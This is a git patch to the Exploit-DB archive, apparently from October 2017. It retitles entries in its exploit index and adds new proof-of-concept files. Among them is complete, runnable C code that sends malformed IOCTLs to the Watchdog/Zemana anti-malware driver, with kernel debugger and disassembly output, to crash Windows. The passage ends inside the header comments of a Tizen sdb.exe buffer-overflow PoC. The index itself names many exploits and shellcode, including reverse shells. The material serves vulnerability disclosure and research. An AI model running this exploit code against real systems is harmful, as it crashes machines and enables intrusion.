From b4050a4e4b30e701b994cb42e50477bf36e77448 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 28 Oct 2017 05:01:35 +0000
Subject: [PATCH] DB: 2017-10-28

3 new exploits

Boloto Media Player 1.0.0.9 - pls file Denial of Service
Boloto Media Player 1.0.0.9 - '.pls' File Denial of Service

HP Operations Manager 8.16 - 'srcvw4.dll' LoadFile()/SaveFile() Remote Unicode Stack Overflow (PoC)
HP Operations Manager 8.16 - 'srcvw4.dll' 'LoadFile()'/'SaveFile()' Remote Unicode Stack Overflow (PoC)

id software quake ii server 3.2 - Multiple Vulnerabilities
ID Software Quake II Server 3.2 - Multiple Vulnerabilities

Couchdb 1.5.0 - uuids Denial of Service
Couchdb 1.5.0 - 'uuids' Denial of Service
Watchdog Development Anti-Malware / Online Security Pro - NULL Pointer Dereference
Tizen Studio 1.3 Smart Development Bridge <2.3.2 - Buffer Overflow (PoC)

Oracle 10g - LT.FINDRICSET SQL Injection (IDS evasion)
Oracle 10g - 'LT.FINDRICSET' SQL Injection (IDS Evasion)

Linux Kernel < 2.6.22 - 'ftruncate()/open()' Privilege Escalation
Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Privilege Escalation

MinaliC WebServer 1.0 - Remote Source Disclosure/File Download
MinaliC WebServer 1.0 - Remote Source Disclosure / File Download

PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD (Metasploit)
PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()'/'SaveObject()' Trusted DWORD (Metasploit)

ISC BIND 8.1 - host Remote Buffer Overflow
ISC BIND 8.1 - Host Remote Buffer Overflow

Mozilla Firefox 3.5.3 and SeaMonkey 1.1.17 - 'libpr0n' GIF Parser Heap Based Buffer Overflow
Mozilla Firefox 3.5.3 / SeaMonkey 1.1.17 - 'libpr0n' .GIF Parser Heap Based Buffer Overflow

DameWare Remote Controller <= 12.0.0.520 - Remote Code Execution

RunCMS 1.6 - Blind SQL Injection (IDS evasion)
RunCMS 1.6 - Blind SQL Injection (IDS Evasion)

glFusion 1.1.2 - COM_applyFilter()/order SQL Injection
glFusion 1.1.2 - 'COM_applyFilter()/order' SQL Injection

glFusion 1.1.2 - COM_applyFilter()/cookies Blind SQL Injection
glFusion 1.1.2 - 'COM_applyFilter()/cookies' Blind SQL Injection

Geeklog 1.5.2 - savepreferences()/*blocks[] SQL Injection
Geeklog 1.5.2 - 'savepreferences()/*blocks[]' SQL Injection
---
 files.csv                         |  31 +++---
 platforms/windows/dos/43058.c     | 141 ++++++++++++++++++++++++
 platforms/windows/dos/43060.py    | 176 ++++++++++++++++++++++++++++++
 platforms/windows/remote/43059.py |  79 ++++++++++++++
 4 files changed, 413 insertions(+), 14 deletions(-)
 create mode 100755 platforms/windows/dos/43058.c
 create mode 100755 platforms/windows/dos/43060.py
 create mode 100755 platforms/windows/remote/43059.py

diff --git a/files.csv b/files.csv
index f4faa7e78..977d2f661 100644
--- a/files.csv
+++ b/files.csv
@@ -1223,7 +1223,7 @@ id,file,description,date,author,platform,type,port
 9823,platforms/solaris/dos/9823.c,"Sun Solaris 10 RPC dmispd - Denial of Service",2009-09-24,"Jeremy Brown",solaris,dos,0
 9845,platforms/osx/dos/9845.c,"Apple Mac OSX 10.5.6/10.5.7 - ptrace mutex Denial of Service",2009-11-05,prdelka,osx,dos,0
 9852,platforms/windows/dos/9852.py,"Home FTP Server 1.10.1.139 - 'SITE INDEX' Remote Denial of Service",2009-11-16,zhangmc,windows,dos,21
-9871,platforms/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - pls file Denial of Service",2009-10-27,Dr_IDE,windows,dos,0
+9871,platforms/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - '.pls' File Denial of Service",2009-10-27,Dr_IDE,windows,dos,0
 9874,platforms/windows/dos/9874.txt,"Cherokee Web server 0.5.4 - Denial of Service",2009-10-26,"Usman Saeed",windows,dos,0
 9879,platforms/windows/dos/9879.txt,"EMC RepliStor Server 6.3.1.3 - Denial of Service",2009-10-20,bellick,windows,dos,7144
 9881,platforms/windows/dos/9881.txt,"Eureka Email Client 2.2q - Buffer Overflow (PoC)",2009-10-23,"Francis Provencher",windows,dos,110
@@ -1506,7 +1506,7 @@ id,file,description,date,author,platform,type,port
 12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ - Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0
 12294,platforms/windows/dos/12294.txt,"Avtech Software - ActiveX 'avc781viewer.dll' Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0
 12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c - Modem Reset (Denial of Service)",2010-04-19,hkm,hardware,dos,0
-12302,platforms/windows/dos/12302.html,"HP Operations Manager 8.16 - 'srcvw4.dll' LoadFile()/SaveFile() Remote Unicode Stack Overflow (PoC)",2010-04-20,mr_me,windows,dos,0
+12302,platforms/windows/dos/12302.html,"HP Operations Manager 8.16 - 'srcvw4.dll' 'LoadFile()'/'SaveFile()' Remote Unicode Stack Overflow (PoC)",2010-04-20,mr_me,windows,dos,0
 12314,platforms/windows/dos/12314.py,"Speed Commander 13.10 - '.zip' Memory Corruption",2010-04-20,TecR0c,windows,dos,0
 12324,platforms/multiple/dos/12324.py,"Multiple Browsers - Audio Tag Denial of Service",2010-04-21,"Chase Higgins",multiple,dos,0
 12334,platforms/linux/dos/12334.c,"OpenSSL - Remote Denial of Service",2010-04-22,Andi,linux,dos,0
@@ -3261,7 +3261,7 @@ id,file,description,date,author,platform,type,port
 24699,platforms/windows/dos/24699.txt,"Microsoft Windows XP - '.WAV' File Handler Denial of Service",2004-10-22,HexView,windows,dos,0
 24705,platforms/windows/dos/24705.txt,"Microsoft Internet Explorer 6 - Font Tag Denial of Service",2004-10-26,"Jehiah Czebotar",windows,dos,0
 24708,platforms/windows/dos/24708.txt,"Quicksilver Master of Orion III 1.2.5 - Multiple Remote Denial of Service Vulnerabilities",2004-10-27,"Luigi Auriemma",windows,dos,0
-24710,platforms/multiple/dos/24710.txt,"id software quake ii server 3.2 - Multiple Vulnerabilities",2004-10-27,"Richard Stanway",multiple,dos,0
+24710,platforms/multiple/dos/24710.txt,"ID Software Quake II Server 3.2 - Multiple Vulnerabilities",2004-10-27,"Richard Stanway",multiple,dos,0
 24715,platforms/multiple/dos/24715.txt,"Caudium 1.x - Remote Denial of Service",2004-10-30,"David Gourdelier",multiple,dos,0
 24726,platforms/windows/dos/24726.txt,"Software602 602 LAN Suite - Multiple Remote Denial of Service Vulnerabilities",2004-11-06,"Luigi Auriemma",windows,dos,0
 24733,platforms/windows/dos/24733.pl,"SecureAction Research Secure Network Messenger 1.4.x - Remote Denial of Service",2004-11-12,"Luigi Auriemma",windows,dos,0
@@ -4095,7 +4095,7 @@ id,file,description,date,author,platform,type,port
 32481,platforms/windows/dos/32481.txt,"Light Audio Player 1.0.14 - Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0
 32482,platforms/windows/dos/32482.py,"GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0
 32483,platforms/windows/dos/32483.py,"GOM Video Converter 1.1.0.60 - '.wav' Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0
-32519,platforms/multiple/dos/32519.txt,"Couchdb 1.5.0 - uuids Denial of Service",2014-03-26,"Krusty Hack",multiple,dos,0
+32519,platforms/multiple/dos/32519.txt,"Couchdb 1.5.0 - 'uuids' Denial of Service",2014-03-26,"Krusty Hack",multiple,dos,0
 32513,platforms/windows/dos/32513.py,"Haihaisoft HUPlayer 1.0.4.8 - '.m3u' / '.pls' / '.asx' Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0
 32514,platforms/windows/dos/32514.py,"Haihaisoft Universal Player 1.5.8 - '.m3u' / '.pls '/ '.asx' Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0
 32522,platforms/windows/dos/32522.py,"VirusChaser 8.0 - Stack Buffer Overflow",2014-03-26,wh1ant,windows,dos,0
@@ -5721,6 +5721,8 @@ id,file,description,date,author,platform,type,port
 43014,platforms/linux/dos/43014.txt,"Xen - Unbounded Recursion in Pagetable De-typing",2017-10-18,"Google Security Research",linux,dos,0
 43020,platforms/multiple/dos/43020.txt,"Mozilla Firefox < 55 - Denial of Service",2017-10-20,"Amit Sangra",multiple,dos,0
 43026,platforms/windows/dos/43026.py,"ArGoSoft Mini Mail Server 1.0.0.2 - Denial of Service",2017-10-21,"Berk Cem Göksel",windows,dos,0
+43058,platforms/windows/dos/43058.c,"Watchdog Development Anti-Malware / Online Security Pro - NULL Pointer Dereference",2017-10-26,"Parvez Anwar",windows,dos,0
+43060,platforms/windows/dos/43060.py,"Tizen Studio 1.3 Smart Development Bridge <2.3.2 - Buffer Overflow (PoC)",2017-10-27,"Marcin Kopec",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -6236,7 +6238,7 @@ id,file,description,date,author,platform,type,port
 4564,platforms/multiple/local/4564.txt,"Oracle 10g - 'CTX_DOC.MARKUP' SQL Injection",2007-10-23,sh2kerr,multiple,local,0
 4570,platforms/multiple/local/4570.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (1)",2007-10-27,bunker,multiple,local,0
 4571,platforms/multiple/local/4571.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (2)",2007-10-27,bunker,multiple,local,0
-4572,platforms/multiple/local/4572.txt,"Oracle 10g - LT.FINDRICSET SQL Injection (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0
+4572,platforms/multiple/local/4572.txt,"Oracle 10g - 'LT.FINDRICSET' SQL Injection (IDS Evasion)",2007-10-27,sh2kerr,multiple,local,0
 4583,platforms/windows/local/4583.py,"Sony CONNECT Player 4.x - '.m3u' Local Stack Overflow",2007-10-29,TaMBaRuS,windows,local,0
 4584,platforms/windows/local/4584.c,"Kodak Image Viewer - TIF/TIFF Code Execution (PoC) (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local,0
 4612,platforms/aix/local/4612.py,"IBM AIX 5.3.0 - 'setlocale()' Privilege Escalation",2007-11-07,"Thomas Pollet",aix,local,0
@@ -6305,7 +6307,7 @@ id,file,description,date,author,platform,type,port
 6798,platforms/windows/local/6798.pl,"VideoLAN VLC Media Player 0.9.4 - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0
 6825,platforms/windows/local/6825.pl,"VideoLAN VLC Media Player 0.9.4 - '.ty' Buffer Overflow (SEH)",2008-10-23,"Guido Landi",windows,local,0
 6831,platforms/windows/local/6831.cpp,"TugZip 3.00 Archiver - '.zip' Local Buffer Overflow",2008-10-24,"fl0 fl0w",windows,local,0
-6851,platforms/linux/local/6851.c,"Linux Kernel < 2.6.22 - 'ftruncate()/open()' Privilege Escalation",2008-10-27,gat3way,linux,local,0
+6851,platforms/linux/local/6851.c,"Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Privilege Escalation",2008-10-27,gat3way,linux,local,0
 6994,platforms/windows/local/6994.txt,"Adobe Reader - 'util.printf()' JavaScript Function Stack Overflow (1)",2008-11-05,Elazar,windows,local,0
 7006,platforms/windows/local/7006.txt,"Adobe Reader - 'util.printf()' JavaScript Function Stack Overflow (2)",2008-11-05,"Debasis Mohanty",windows,local,0
 7051,platforms/windows/local/7051.pl,"VideoLAN VLC Media Player < 0.9.6 - '.rt' Stack Buffer Overflow",2008-11-07,SkD,windows,local,0
@@ -10935,7 +10937,7 @@ id,file,description,date,author,platform,type,port
 15298,platforms/multiple/remote/15298.txt,"Sawmill Enterprise < 8.1.7.3 - Multiple Vulnerabilities",2010-10-21,"SEC Consult",multiple,remote,0
 15318,platforms/linux/remote/15318.txt,"NitroSecurity ESM 8.4.0a - Remote Code Execution",2010-10-26,"Filip Palian",linux,remote,0
 15333,platforms/windows/remote/15333.txt,"MinaliC WebServer 1.0 - Directory Traversal",2010-10-27,"John Leitch",windows,remote,0
-15336,platforms/windows/remote/15336.txt,"MinaliC WebServer 1.0 - Remote Source Disclosure/File Download",2010-10-27,Dr_IDE,windows,remote,0
+15336,platforms/windows/remote/15336.txt,"MinaliC WebServer 1.0 - Remote Source Disclosure / File Download",2010-10-27,Dr_IDE,windows,remote,0
 15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA Server 1.06 - Buffer Overflow",2010-10-27,blake,windows,remote,0
 15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - soap_action_name post upnp sscanf Buffer Overflow",2010-10-28,n00b,windows,remote,0
 15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote,0
@@ -11697,7 +11699,7 @@ id,file,description,date,author,platform,type,port
 17969,platforms/multiple/remote/17969.py,"Apache mod_proxy - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0
 17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - 'SVG Layout' Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0
 17974,platforms/windows/remote/17974.html,"Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (1)",2011-10-12,ryujin,windows,remote,0
-17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0
+17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()'/'SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0
 17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (Metasploit) (2)",2011-10-13,Metasploit,windows,remote,0
 17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Exploit",2011-10-11,kingcope,windows,remote,0
 17986,platforms/osx/remote/17986.rb,"Apple Safari - 'file://' Arbitrary Code Execution (Metasploit)",2011-10-17,Metasploit,osx,remote,0
@@ -12305,7 +12307,7 @@ id,file,description,date,author,platform,type,port
 20370,platforms/cgi/remote/20370.txt,"Kootenay Web Inc whois 1.0 - Remote Command Execution",2000-10-29,"Mark Stratman",cgi,remote,0
 20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/WfW - smbclient Directory Traversal",1995-10-30,"Dan Shearer",windows,remote,0
 20372,platforms/hardware/remote/20372.pl,"Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 - Remote Username / Password Retrieval",2000-10-26,@stake,hardware,remote,0
-20374,platforms/unix/remote/20374.c,"ISC BIND 8.1 - host Remote Buffer Overflow",2000-10-27,antirez,unix,remote,0
+20374,platforms/unix/remote/20374.c,"ISC BIND 8.1 - Host Remote Buffer Overflow",2000-10-27,antirez,unix,remote,0
 20375,platforms/windows/remote/20375.txt,"Sun Java Web Server 1.1 Beta - Viewable .jhtml Source",1997-07-16,"Brian Krahmer",windows,remote,0
 20384,platforms/windows/remote/20384.txt,"Microsoft IIS 4.0/5.0 - Executable File Parsing",2000-11-06,Nsfocus,windows,remote,0
 20387,platforms/cgi/remote/20387.txt,"YaBB 9.11.2000 - search.pl Arbitrary Command Execution",2000-11-07,rpc,cgi,remote,0
@@ -14773,7 +14775,7 @@ id,file,description,date,author,platform,type,port
 33645,platforms/windows/remote/33645.py,"httpdx 1.5 - 'MKD' Directory Traversal",2010-02-15,fb1h2s,windows,remote,0
 33310,platforms/multiple/remote/33310.nse,"VMware Server 2.0.1 / ESXi Server 3.5 - Directory Traversal",2009-10-27,"Justin Morehouse",multiple,remote,0
 33311,platforms/linux/remote/33311.txt,"KDE 4.3.2 - Multiple Input Validation Vulnerabilities",2009-10-27,"Tim Brown",linux,remote,0
-33313,platforms/linux/remote/33313.txt,"Mozilla Firefox 3.5.3 and SeaMonkey 1.1.17 - 'libpr0n' GIF Parser Heap Based Buffer Overflow",2009-10-27,regenrecht,linux,remote,0
+33313,platforms/linux/remote/33313.txt,"Mozilla Firefox 3.5.3 / SeaMonkey 1.1.17 - 'libpr0n' .GIF Parser Heap Based Buffer Overflow",2009-10-27,regenrecht,linux,remote,0
 33315,platforms/linux/remote/33315.java,"Sun Java SE November 2009 - Multiple Vulnerabilities (1)",2009-10-29,Tometzky,linux,remote,0
 33316,platforms/multiple/remote/33316.java,"Sun Java SE November 2009 - Multiple Vulnerabilities (2)",2009-10-29,Tometzky,multiple,remote,0
 33594,platforms/windows/remote/33594.txt,"Microsoft Windows Vista/2008 - ICMPv6 Router Advertisement Remote Code Execution",2010-02-09,"Sumit Gwalani",windows,remote,0
@@ -15927,6 +15929,7 @@ id,file,description,date,author,platform,type,port
 43031,platforms/lin_x86/remote/43031.rb,"Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit)",2017-10-23,Metasploit,lin_x86,remote,1743
 43032,platforms/unix/remote/43032.rb,"Polycom - Command Shell Authorization Bypass (Metasploit)",2017-10-23,Metasploit,unix,remote,0
 43055,platforms/hardware/remote/43055.rb,"Netgear DGN1000 1.1.00.48 - 'Setup.cgi' Unauthenticated Remote Code Execution (Metasploit)",2017-10-25,Metasploit,hardware,remote,0
+43059,platforms/windows/remote/43059.py,"DameWare Remote Controller <= 12.0.0.520 - Remote Code Execution",2016-04-03,Securifera,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -18968,7 +18971,7 @@ id,file,description,date,author,platform,type,port
 4789,platforms/php/webapps/4789.php,"PMOS Help Desk 2.4 - Remote Command Execution",2007-12-25,EgiX,php,webapps,0
 4790,platforms/php/webapps/4790.txt,"RunCMS 1.6 - Multiple Vulnerabilities",2007-12-25,DSecRG,php,webapps,0
 4791,platforms/php/webapps/4791.txt,"eSyndiCat Link Exchange Script 2005-2006 - SQL Injection",2007-12-25,EgiX,php,webapps,0
-4792,platforms/php/webapps/4792.pl,"RunCMS 1.6 - Blind SQL Injection (IDS evasion)",2007-12-26,sh2kerr,php,webapps,0
+4792,platforms/php/webapps/4792.pl,"RunCMS 1.6 - Blind SQL Injection (IDS Evasion)",2007-12-26,sh2kerr,php,webapps,0
 4793,platforms/php/webapps/4793.txt,"Blakord Portal Beta 1.3.A (All Modules) - SQL Injection",2007-12-26,JosS,php,webapps,0
 4794,platforms/php/webapps/4794.pl,"XZero Community Classifieds 4.95.11 - Local File Inclusion / SQL Injection",2007-12-26,Kw3[R]Ln,php,webapps,0
 4795,platforms/php/webapps/4795.txt,"XZero Community Classifieds 4.95.11 - Remote File Inclusion",2007-12-26,Kw3[R]Ln,php,webapps,0
@@ -21556,7 +21559,7 @@ id,file,description,date,author,platform,type,port
 8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",php,webapps,0
 8297,platforms/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",php,webapps,0
 8298,platforms/php/webapps/8298.pl,"My Simple Forum 7.1 - Remote Command Execution",2009-03-27,Osirys,php,webapps,0
-8302,platforms/php/webapps/8302.php,"glFusion 1.1.2 - COM_applyFilter()/order SQL Injection",2009-03-29,Nine:Situations:Group,php,webapps,0
+8302,platforms/php/webapps/8302.php,"glFusion 1.1.2 - 'COM_applyFilter()/order' SQL Injection",2009-03-29,Nine:Situations:Group,php,webapps,0
 8304,platforms/php/webapps/8304.txt,"Arcadwy Arcade Script - (Authentication Bypass) Insecure Cookie Handling",2009-03-29,ZoRLu,php,webapps,0
 8305,platforms/php/webapps/8305.txt,"iWare CMS 5.0.4 - Multiple SQL Injections",2009-03-29,boom3rang,php,webapps,0
 8307,platforms/asp/webapps/8307.txt,"Diskos CMS Manager - SQL Injection / File Disclosure / Authentication Bypass",2009-03-30,AnGeL25dZ,asp,webapps,0
@@ -21577,7 +21580,7 @@ id,file,description,date,author,platform,type,port
 8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - 'page' SQL Injection",2009-04-01,cOndemned,php,webapps,0
 8342,platforms/php/webapps/8342.txt,"TinyPHPForum 3.61 - File Disclosure / Code Execution",2009-04-01,brain[pillow],php,webapps,0
 8346,platforms/php/webapps/8346.txt,"ActiveKB KnowledgeBase - 'Panel' Local File Inclusion",2009-04-03,"Angela Chang",php,webapps,0
-8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 - COM_applyFilter()/cookies Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps,0
+8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 - 'COM_applyFilter()/cookies' Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps,0
 8348,platforms/php/webapps/8348.txt,"form2list - 'page.php?id' SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0
 8349,platforms/php/webapps/8349.c,"Family Connections 1.8.2 - Arbitrary File Upload",2009-04-03,"Salvatore Fresta",php,webapps,0
 8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0 Beta - SQL Injection / Authenticated Code Execution",2009-04-03,brain[pillow],php,webapps,0
@@ -21632,7 +21635,7 @@ id,file,description,date,author,platform,type,port
 8442,platforms/php/webapps/8442.txt,"Job2C - 'conf.inc' Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0
 8443,platforms/php/webapps/8443.txt,"Job2C 4.2 - 'adtype' Local File Inclusion",2009-04-15,ZoRLu,php,webapps,0
 8446,platforms/php/webapps/8446.txt,"FreeWebShop.org 2.2.9 RC2 - 'lang_file' Local File Inclusion",2009-04-15,ahmadbady,php,webapps,0
-8448,platforms/php/webapps/8448.php,"Geeklog 1.5.2 - savepreferences()/*blocks[] SQL Injection",2009-04-16,Nine:Situations:Group,php,webapps,0
+8448,platforms/php/webapps/8448.php,"Geeklog 1.5.2 - 'savepreferences()/*blocks[]' SQL Injection",2009-04-16,Nine:Situations:Group,php,webapps,0
 8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 - Authentication Bypass",2009-04-16,Dns-Team,php,webapps,0
 8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,php,webapps,0
 8453,platforms/php/webapps/8453.txt,"webSPELL 4.2.0c - Bypass BBCode Cross-Site Scripting Cookie Stealing",2009-04-16,YEnH4ckEr,php,webapps,0
diff --git a/platforms/windows/dos/43058.c b/platforms/windows/dos/43058.c
new file mode 100755
index 000000000..80576162e
--- /dev/null
+++ b/platforms/windows/dos/43058.c
@@ -0,0 +1,141 @@
+/*
+
+Exploit Title    - Watchdog Development Anti-Malware/Online Security Pro Null Pointer Dereference
+Date             - 26th October 2017
+Discovered by    - Parvez Anwar (@parvezghh)
+Vendor Homepage  - https://www.watchdogdevelopment.com/
+Tested Version   - 2.74.186.150
+Driver Version   - 2.21.63 - zam32.sys
+Tested on OS     - 32bit Windows 7 SP1 
+CVE IDs          - CVE-2017-15920 and CVE-2017-15921
+Vendor fix url   - Will be fixed in a future release
+Fixed Version    - n/a
+Fixed driver ver - n/a
+
+
+
+A null pointer dereference vulnerability is triggered when sending an operation
+to ioctls 0x80002010 or 0x80002054. This is due to input buffer being NULL or
+the input buffer size being 0 as they are not validated.
+
+kd> dt nt!_irp @esi -r
+   +0x000 Type             : 0n6
+   +0x002 Size             : 0x94
+   +0x004 MdlAddress       : (null) 
+   +0x008 Flags            : 0x60000
+   +0x00c AssociatedIrp    : <unnamed-tag>
+      +0x000 MasterIrp        : (null) 
+      +0x000 IrpCount         : 0n0
+      +0x000 SystemBuffer     : (null)  <----------- null pointer
+
+
+0x80002010
+----------
+CVE-2017-15921
+
+kd> r
+eax=00000000 ebx=80002010 ecx=cff82bd9 edx=90889f2e esi=00000000 edi=c0000001
+eip=9087cd9f esp=a7a80ab8 ebp=a7a80ab8 iopl=0         nv up ei pl nz na po nc
+cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000202
+zam32+0xdd9f:
+9087cd9f ff30            push    dword ptr [eax]      ds:0023:00000000=????????
+
+
+.text:90AD9104                 push    offset aIoctl_register                        ; "IOCTL_REGISTER_PROCESS"
+.text:90AD9109                 push    0                                             
+.text:90AD910B                 push    edx                                           ; Pointer to "DeviceIoControlHandler" string
+.text:90AD910C                 push    208h
+.text:90AD9111                 push    offset aMain_c                                
+.text:90AD9116                 push    1
+.text:90AD9118                 call    sub_90AD3ADA
+.text:90AD911D                 add     esp, 18h
+.text:90AD9120                 push    esi                                           ; esi is null becomes arg_0 otherwise would point to our input "SystemBuffer"
+.text:90AD9121                 call    sub_90AD8D90
+
+.text:90AD8D90 sub_90AD8D90    proc near                                             
+.text:90AD8D90
+.text:90AD8D90 arg_0           = dword ptr  8
+.text:90AD8D90
+.text:90AD8D90                 push    ebp                                           
+.text:90AD8D91                 mov     ebp, esp
+.text:90AD8D93                 call    sub_90AD414A
+.text:90AD8D98                 test    eax, eax
+.text:90AD8D9A                 jz      short loc_90AD8DA6
+.text:90AD8D9C                 mov     eax, [ebp+arg_0]                              ; Null pointer dereference 
+.text:90AD8D9F                 push    dword ptr [eax]                               ; BSOD !!!!
+.text:90AD8DA1                 call    sub_90AD428C
+.text:90AD8DA6
+.text:90AD8DA6 loc_90AD8DA6:                                                         
+.text:90AD8DA6                 pop     ebp
+.text:90AD8DA7                 retn    4
+.text:90AD8DA7 sub_90AD8D90    endp
+.text:90AD8DA7
+.text:90AD8DAA
+
+
+0x80002054
+----------
+CVE-2017-15920
+
+kd> r
+eax=861e8320 ebx=80002054 ecx=cff82bd9 edx=90889f2e esi=00000000 edi=c0000001
+eip=9087d41a esp=99f4eaac ebp=99f4eadc iopl=0         nv up ei pl zr na pe nc
+cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000246
+zam32+0xe41a:
+9087d41a c7061e010000    mov     dword ptr [esi],11Eh ds:0023:00000000=????????
+
+
+.text:90AD9401                 push    offset aIoctl_get_driv                        ; IOCTL_GET_DRIVER_PROTOCOL
+.text:90AD9406                 push    0
+.text:90AD9408                 push    edx
+.text:90AD9409                 push    2A3h
+.text:90AD940E                 push    offset aMain_c                                
+.text:90AD9413                 push    1
+.text:90AD9415                 call    sub_90AD3ADA
+.text:90AD941A                 mov     dword ptr [esi], 11Eh                         ; BSOD !!!! Null pointer dereference otherwise would point to our input "SystemBuffer"
+.text:90AD9420                 jmp     loc_90AD9622
+
+
+*/
+
+
+#include <stdio.h>
+#include <windows.h>
+
+int main(int argc, char *argv[]) 
+{
+    HANDLE         hDevice;
+    char           devhandle[MAX_PATH];
+    DWORD          dwRetBytes = 0;
+
+
+    sprintf(devhandle, "\\\\.\\%s", "zemanaantimalware");
+
+    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
+    
+    if(hDevice == INVALID_HANDLE_VALUE)
+    {
+        printf("\n[-] Open %s device failed\n\n", devhandle);
+        return -1;
+    }
+    else 
+    {
+        printf("\n[+] Open %s device successful", devhandle);
+    }	
+
+    printf("\n[~] Press any key to continue . . .");
+    getch();
+
+    DeviceIoControl(hDevice, 0x80002010, NULL, 0, NULL, 0, &dwRetBytes, NULL);
+//  DeviceIoControl(hDevice, 0x80002054, NULL, 0, NULL, 0, &dwRetBytes, NULL);
+
+    printf("\n[+] DoSed\n\n");
+ 
+    CloseHandle(hDevice);
+    return 0;
+}
+
+
+
+
+
diff --git a/platforms/windows/dos/43060.py b/platforms/windows/dos/43060.py
new file mode 100755
index 000000000..f34bd53ec
--- /dev/null
+++ b/platforms/windows/dos/43060.py
@@ -0,0 +1,176 @@
+# Exploit Title: Smart Development Bridge <=2.3.2 (part of Tizen Studio 1.3 Windows x86/x64) - Buffer Overflow PoC
+# Date: 22.10.17
+# Exploit Author: Marcin Kopec
+# Vendor Homepage: https://developer.tizen.org/
+# Software Link: https://developer.tizen.org/development/tizen-studio/download#
+# Version: 2.3.0, 2.3.2 (some older versions are affected as well)
+# Tested on: Microsoft Windows [Version 10.0.16299.19]
+# 2.3.2 (sdb.exe can be extracted from Tizen Studio 1.3 for Windows x86/x64 installation package):
+# e88de99ee069412b7612d85c00aa62fc  sdb.exe
+# 2.3.0:
+# f9fd3896195900ec604c6f182a411e18  sdb.exe
+# The file can be located in "tools" subdirectory after the extraction
+
+# This code has been created for educational purposes only, to raise awareness on software security, and it's harmless
+# by intention (the PoC runs calc.exe). Please do not change the code behaviour to malicious
+
+# Vulnerability Discovery History
+# 28/Jul/16 - Tizen Project has been informed about the vulnerability (https://bugs.tizen.org/browse/TM-249)
